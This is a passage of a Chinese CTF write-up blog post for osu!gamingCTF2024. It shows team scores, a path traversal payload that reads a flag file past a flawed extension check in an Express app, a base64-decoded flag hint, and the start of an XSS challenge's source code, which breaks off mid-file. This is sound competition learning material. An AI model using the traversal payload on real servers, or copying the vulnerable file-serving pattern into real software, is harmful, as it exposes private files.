<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="teamName: Ciallo rank: #65 points: 3243 blockchain (0&#x2F;3 solved)	-&gt; 0&#x2F;3243 crypto (6&#x2F;8 solved)	-&gt; 744&#x2F;3243 forensics (1&#x2F;5 solved)	-&gt; 117&#x2F;3243 misc (3&#x2F;9 solv">
<meta property="og:type" content="article">
<meta property="og:title" content="osu!gamingCTF2024 wp">
<meta property="og:url" content="http://example.com/2024/07/14/osu-gamingCTF2024-wp/index.html">
<meta property="og:site_name" content="oSthing&#39;s Blog">
<meta property="og:description" content="teamName: Ciallo rank: #65 points: 3243 blockchain (0&#x2F;3 solved)	-&gt; 0&#x2F;3243 crypto (6&#x2F;8 solved)	-&gt; 744&#x2F;3243 forensics (1&#x2F;5 solved)	-&gt; 117&#x2F;3243 misc (3&#x2F;9 solv">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-07-14T05:25:13.000Z">
<meta property="article:modified_time" content="2024-07-14T05:29:22.537Z">
<meta property="article:author" content="oSthing">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>osu!gamingCTF2024 wp</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/oSthing">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/07/14/graycatCTF2024-WP/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/07/14/prealCTF2024-WP/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/07/14/osu-gamingCTF2024-wp/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&text=osu!gamingCTF2024 wp"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&title=osu!gamingCTF2024 wp"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&is_video=false&description=osu!gamingCTF2024 wp"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=osu!gamingCTF2024 wp&body=Check out this article: http://example.com/2024/07/14/osu-gamingCTF2024-wp/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&title=osu!gamingCTF2024 wp"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&title=osu!gamingCTF2024 wp"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&title=osu!gamingCTF2024 wp"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&title=osu!gamingCTF2024 wp"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&name=osu!gamingCTF2024 wp&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&t=osu!gamingCTF2024 wp"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#mikufanpage-490-solves-104-points"><span class="toc-number">1.</span> <span class="toc-text">mikufanpage(490 solves &#x2F; 104 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#when-you-dont-see-it-235-solves-111-points"><span class="toc-number">2.</span> <span class="toc-text">when-you-dont-see-it(235 solves &#x2F; 111 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#profile-page-190-solves-114-points"><span class="toc-number">3.</span> <span class="toc-text">profile-page(190 solves &#x2F; 114 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#stream-vs-79-solves-138-points"><span class="toc-number">4.</span> <span class="toc-text">stream-vs(79 solves &#x2F; 138 points)</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        osu!gamingCTF2024 wp
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">oSthing</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-07-14T05:25:13.000Z" class="dt-published" itemprop="datePublished">2024-07-14</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/ctf/" rel="tag">ctf</a>, <a class="p-category" href="/tags/wp/" rel="tag">wp</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <blockquote>
<p>teamName: Ciallo</p>
<p>rank: #65</p>
<p>points: 3243</p>
<p>blockchain (0&#x2F;3 solved)	-&gt; 0&#x2F;3243</p>
<p>crypto (6&#x2F;8 solved)	-&gt; 744&#x2F;3243</p>
<p>forensics (1&#x2F;5 solved)	-&gt; 117&#x2F;3243</p>
<p>misc (3&#x2F;9 solved)	-&gt; 304&#x2F;3243</p>
<p>osint (1&#x2F;4 solved)	-&gt;106&#x2F;3243</p>
<p>osu (5&#x2F;10 solved)	-&gt; 550&#x2F;3243</p>
<p>pwn (3&#x2F;4 solved)	-&gt; 422&#x2F;3243</p>
<p>reverse (4&#x2F;5 solved)	-&gt; 533&#x2F;3243</p>
<p>web (4&#x2F;6 solved)	-&gt; 467&#x2F;3243</p>
</blockquote>
<h2 id="mikufanpage-490-solves-104-points"><a href="#mikufanpage-490-solves-104-points" class="headerlink" title="mikufanpage(490 solves &#x2F; 104 points)"></a><strong>mikufanpage</strong>(490 solves &#x2F; 104 points)</h2><p> <a target="_blank" rel="noopener" href="https://mikufanpage.web.osugaming.lol/">https://mikufanpage.web.osugaming.lol/</a></p>
<p>打开网页里面是一个图片的幻灯片循环播放，题目给了附件</p>
<p>题目目录是这样的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">│  app.js</span><br><span class="line">│  package-lock.json</span><br><span class="line">│  package.json</span><br><span class="line">│</span><br><span class="line">├─img</span><br><span class="line">│      flag.txt</span><br><span class="line">│      miku1.jpg</span><br><span class="line">│      miku2.jpg</span><br><span class="line">│      miku3.png</span><br><span class="line">│      miku4.png</span><br><span class="line">│      miku5.jpg</span><br><span class="line">│      miku6.png</span><br><span class="line">│      miku7.jpg</span><br><span class="line">│</span><br><span class="line">└─public</span><br><span class="line">        cube.mp3</span><br><span class="line">        dance.gif</span><br><span class="line">        favicon.ico</span><br><span class="line">        index.html</span><br></pre></td></tr></table></figure>

<p>主要看app.js</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>); </span><br><span class="line"><span class="keyword">const</span> path = <span class="built_in">require</span>(<span class="string">&#x27;path&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = <span class="title function_">express</span>(); </span><br><span class="line"><span class="keyword">const</span> <span class="variable constant_">PORT</span> = process.<span class="property">env</span>.<span class="property">PORT</span> ?? <span class="number">3000</span>;</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">use</span>(express.<span class="title function_">static</span>(path.<span class="title function_">join</span>(__dirname, <span class="string">&#x27;public&#x27;</span>)));</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">listen</span>(<span class="variable constant_">PORT</span>, <span class="function">(<span class="params">err</span>) =&gt;</span>&#123; </span><br><span class="line">    <span class="keyword">if</span>(!err) </span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;mikufanpage running on port &quot;</span>+ <span class="variable constant_">PORT</span>) </span><br><span class="line">    <span class="keyword">else</span> </span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;Err &quot;</span>, err); </span><br><span class="line">&#125;); </span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&quot;/image&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (req.<span class="property">query</span>.<span class="property">path</span>.<span class="title function_">split</span>(<span class="string">&quot;.&quot;</span>)[<span class="number">1</span>] === <span class="string">&quot;png&quot;</span> || req.<span class="property">query</span>.<span class="property">path</span>.<span class="title function_">split</span>(<span class="string">&quot;.&quot;</span>)[<span class="number">1</span>] === <span class="string">&quot;jpg&quot;</span>) &#123; <span class="comment">// only allow images</span></span><br><span class="line">        res.<span class="title function_">sendFile</span>(path.<span class="title function_">resolve</span>(<span class="string">&#x27;./img/&#x27;</span> + req.<span class="property">query</span>.<span class="property">path</span>));</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        res.<span class="title function_">status</span>(<span class="number">403</span>).<span class="title function_">send</span>(<span class="string">&#x27;Access Denied&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>我们的目的是要读取img下的flag.txt，关键代码如下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (req.<span class="property">query</span>.<span class="property">path</span>.<span class="title function_">split</span>(<span class="string">&quot;.&quot;</span>)[<span class="number">1</span>] === <span class="string">&quot;png&quot;</span> || req.<span class="property">query</span>.<span class="property">path</span>.<span class="title function_">split</span>(<span class="string">&quot;.&quot;</span>)[<span class="number">1</span>] === <span class="string">&quot;jpg&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>根据点来分割得到后缀名，那我们只需要用点把”png” 包裹住然后再在后面用 ..&#x2F; 进行目录穿越即可，最后payload就是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/image?path=miku1.jpg./../flag.txt</span><br></pre></td></tr></table></figure>

<p>得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">osu&#123;miku_miku_miku_miku_miku_miku_miku_miku_miku_miku_miku_miku_miku&#125;</span><br></pre></td></tr></table></figure>

<h2 id="when-you-dont-see-it-235-solves-111-points"><a href="#when-you-dont-see-it-235-solves-111-points" class="headerlink" title="when-you-dont-see-it(235 solves &#x2F; 111 points)"></a><strong>when-you-dont-see-it</strong>(235 solves &#x2F; 111 points)</h2><p><a target="_blank" rel="noopener" href="https://osu.ppy.sh/users/11118671">https://osu.ppy.sh/users/11118671</a></p>
<p>给了一个osu的<a target="_blank" rel="noopener" href="https://osu.ppy.sh/users/11118671">用户界面</a></p>
<p>右键查看源代码搜索flag，在最后一个flag出找到flag提示(这题解的人少的原因估计是搜索出来有342个flag字样然后懒得看吧&#x3D; &#x3D;)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[color=]the flag is b3N1e29rX3Vfc2VlX21lfQ== encoded with base64</span><br></pre></td></tr></table></figure>

<p>base64解码一下得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">osu&#123;ok_u_see_me&#125;</span><br></pre></td></tr></table></figure>

<h2 id="profile-page-190-solves-114-points"><a href="#profile-page-190-solves-114-points" class="headerlink" title="profile-page(190 solves &#x2F; 114 points)"></a><strong>profile-page</strong>(190 solves &#x2F; 114 points)</h2><p><a target="_blank" rel="noopener" href="https://profile-page.web.osugaming.lol/login">https://profile-page.web.osugaming.lol/login</a></p>
<p><a target="_blank" rel="noopener" href="https://adminbot.web.osugaming.lol/profile-page">https://adminbot.web.osugaming.lol/profile-page</a></p>
<p>给了两个网页，一个<a target="_blank" rel="noopener" href="https://profile-page.web.osugaming.lol/login">用户登录注册页面</a>，一个检查<a target="_blank" rel="noopener" href="https://adminbot.web.osugaming.lol/profile-page">访问页面</a>并且给了题目<a href="./profile-page.zip">附件</a></p>
<p>先简单看一下两个页面实现了什么再进行代码审计</p>
<p>首先是登录注册的注册好之后会直接登录，登录进去的用户界面是一个仿osu官网的用户界面</p>
<p>然后是检查访问界面</p>
<p>输入你用户的url会有一个机器人访问你的用户界面</p>
<p>有机器人进行页面访问，那猜测大概率是xss题了</p>
<p>ok，接下来我们看题目的源码先看app.js</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//app.js</span></span><br><span class="line"><span class="keyword">import</span> express <span class="keyword">from</span> <span class="string">&quot;express&quot;</span>;</span><br><span class="line"><span class="keyword">import</span> expressSession <span class="keyword">from</span> <span class="string">&quot;express-session&quot;</span>;</span><br><span class="line"><span class="keyword">import</span> cookieParser <span class="keyword">from</span> <span class="string">&quot;cookie-parser&quot;</span>;</span><br><span class="line"><span class="keyword">import</span> crypto <span class="keyword">from</span> <span class="string">&quot;crypto&quot;</span>;</span><br><span class="line"><span class="keyword">import</span> &#123; <span class="variable constant_">JSDOM</span> &#125; <span class="keyword">from</span> <span class="string">&quot;jsdom&quot;</span>;</span><br><span class="line"><span class="keyword">import</span> <span class="title class_">DOMPurify</span> <span class="keyword">from</span> <span class="string">&quot;dompurify&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = <span class="title function_">express</span>();</span><br><span class="line"><span class="keyword">const</span> <span class="variable constant_">PORT</span> = process.<span class="property">env</span>.<span class="property">PORT</span> || <span class="number">2727</span>;</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">use</span>(express.<span class="title function_">urlencoded</span>(&#123; <span class="attr">extended</span>: <span class="literal">false</span> &#125;));</span><br><span class="line">app.<span class="title function_">use</span>(<span class="title function_">expressSession</span>(&#123;</span><br><span class="line">    <span class="attr">secret</span>: crypto.<span class="title function_">randomBytes</span>(<span class="number">32</span>).<span class="title function_">toString</span>(<span class="string">&quot;hex&quot;</span>),</span><br><span class="line">    <span class="attr">resave</span>: <span class="literal">false</span>,</span><br><span class="line">    <span class="attr">saveUninitialized</span>: <span class="literal">false</span></span><br><span class="line">&#125;));</span><br><span class="line">app.<span class="title function_">use</span>(express.<span class="title function_">static</span>(<span class="string">&quot;public&quot;</span>));</span><br><span class="line">app.<span class="title function_">use</span>(<span class="title function_">cookieParser</span>());</span><br><span class="line">app.<span class="title function_">set</span>(<span class="string">&quot;view engine&quot;</span>, <span class="string">&quot;hbs&quot;</span>);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">use</span>(<span class="function">(<span class="params">req, res, next</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (req.<span class="property">session</span>.<span class="property">user</span> &amp;&amp; users.<span class="title function_">has</span>(req.<span class="property">session</span>.<span class="property">user</span>)) &#123;</span><br><span class="line">        req.<span class="property">user</span> = users.<span class="title function_">get</span>(req.<span class="property">session</span>.<span class="property">user</span>);</span><br><span class="line">        res.<span class="property">locals</span>.<span class="property">user</span> = req.<span class="property">user</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="title function_">next</span>();</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="variable language_">window</span> = <span class="keyword">new</span> <span class="title function_">JSDOM</span>(<span class="string">&#x27;&#x27;</span>).<span class="property">window</span>;</span><br><span class="line"><span class="keyword">const</span> purify = <span class="title class_">DOMPurify</span>(<span class="variable language_">window</span>);</span><br><span class="line"><span class="keyword">const</span> <span class="title function_">renderBBCode</span> = (<span class="params">data</span>) =&gt; &#123;</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[b\](.+?)\[\/b\]/g</span>, <span class="string">&#x27;&lt;strong&gt;$1&lt;/strong&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[i\](.+?)\[\/i\]/g</span>, <span class="string">&#x27;&lt;i&gt;$1&lt;/i&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[u\](.+?)\[\/u\]/g</span>, <span class="string">&#x27;&lt;u&gt;$1&lt;/u&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[strike\](.+?)\[\/strike\]/g</span>, <span class="string">&#x27;&lt;strike&gt;$1&lt;/strike&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[color=#([0-9a-f]&#123;6&#125;)\](.+?)\[\/color\]/g</span>, <span class="string">&#x27;&lt;span style=&quot;color: #$1&quot;&gt;$2&lt;/span&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[size=(\d+)\](.+?)\[\/size\]/g</span>, <span class="string">&#x27;&lt;span style=&quot;font-size: $1px&quot;&gt;$2&lt;/span&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[url=(.+?)\](.+?)\[\/url\]/g</span>, <span class="string">&#x27;&lt;a href=&quot;$1&quot;&gt;$2&lt;/a&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[img\](.+?)\[\/img\]/g</span>, <span class="string">&#x27;&lt;img src=&quot;$1&quot; /&gt;&#x27;</span>);</span><br><span class="line">    <span class="keyword">return</span> data;</span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">const</span> <span class="title function_">renderBio</span> = (<span class="params">data</span>) =&gt; &#123;</span><br><span class="line">    <span class="keyword">const</span> html = <span class="title function_">renderBBCode</span>(data);</span><br><span class="line">    <span class="keyword">const</span> sanitized = purify.<span class="title function_">sanitize</span>(html);</span><br><span class="line">    <span class="comment">// do this after sanitization because otherwise iframe will be removed</span></span><br><span class="line">    <span class="keyword">return</span> sanitized.<span class="title function_">replaceAll</span>(</span><br><span class="line">        <span class="regexp">/\[youtube\](.+?)\[\/youtube\]/g</span>,</span><br><span class="line">        <span class="string">&#x27;&lt;iframe sandbox=&quot;allow-scripts&quot; width=&quot;640px&quot; height=&quot;480px&quot; src=&quot;https://www.youtube.com/embed/$1&quot; frameborder=&quot;0&quot; allowfullscreen&gt;&lt;/iframe&gt;&#x27;</span></span><br><span class="line">    );</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="title function_">sha256</span> = (<span class="params">data</span>) =&gt; crypto.<span class="title function_">createHash</span>(<span class="string">&#x27;sha256&#x27;</span>).<span class="title function_">update</span>(data).<span class="title function_">digest</span>(<span class="string">&#x27;hex&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> users = <span class="keyword">new</span> <span class="title class_">Map</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="title function_">requiresLogin</span> = (<span class="params">req, res, next</span>) =&gt; req.<span class="property">user</span> ? <span class="title function_">next</span>() : res.<span class="title function_">redirect</span>(<span class="string">&quot;/login&quot;</span>);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">post</span>(<span class="string">&quot;/api/register&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> &#123; username, password &#125; = req.<span class="property">body</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!username || <span class="keyword">typeof</span> username !== <span class="string">&quot;string&quot;</span> || !password || <span class="keyword">typeof</span> password !== <span class="string">&quot;string&quot;</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;missing username or password&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (username.<span class="property">length</span> &lt; <span class="number">5</span> || password.<span class="property">length</span> &lt; <span class="number">8</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;username or password too short&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (username.<span class="property">length</span> &gt; <span class="number">30</span> || <span class="regexp">/[^A-Za-z0-9 ]/</span>.<span class="title function_">test</span>(username)) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;invalid username format&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (users.<span class="title function_">has</span>(username)) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;a user already exists with that username&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    users.<span class="title function_">set</span>(username, &#123;</span><br><span class="line">        username,</span><br><span class="line">        <span class="attr">password</span>: <span class="title function_">sha256</span>(password),</span><br><span class="line">        <span class="attr">bio</span>: <span class="title function_">renderBio</span>(<span class="string">`Welcome to <span class="subst">$&#123;username&#125;</span>&#x27;s page!`</span>)</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    req.<span class="property">session</span>.<span class="property">user</span> = username;</span><br><span class="line">    res.<span class="title function_">cookie</span>(<span class="string">&quot;csrf&quot;</span>, crypto.<span class="title function_">randomBytes</span>(<span class="number">32</span>).<span class="title function_">toString</span>(<span class="string">&quot;hex&quot;</span>));</span><br><span class="line">    res.<span class="title function_">redirect</span>(<span class="string">&quot;/profile/&quot;</span> + username);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">post</span>(<span class="string">&quot;/api/login&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> &#123; username, password &#125; = req.<span class="property">body</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!username || <span class="keyword">typeof</span> username !== <span class="string">&quot;string&quot;</span> || 